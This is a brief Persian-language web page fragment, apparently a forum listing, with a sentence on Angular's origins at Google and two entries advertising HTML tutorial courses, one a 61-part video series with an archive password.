شماره 1.0 از انگولار در سال 2012 منتشر شد. در سال 2009 یکی از کارمندان گوگل به نام Miško Hevery، شروع به کار بر روی انگولار نمود. ایده ی مورد نظر بسیار خوب از آب در آمد و در نهایت این پروژه بطور رسمی توسط گوگل پشتیبانی می شود.
  24. Programming-HTML

    در این تایپیگ اموزش 0تا 100 htmlبه صورت فیلم قرار داده خواهد شد تعداد پارت 61 رمز تمام فایل ها anonysec.org
  25. Programming-HTML

    دوره آموزشی حرفه ای html *یادگیری ساده *آموزش به صورت متن *دارای مثال های پی در پی
×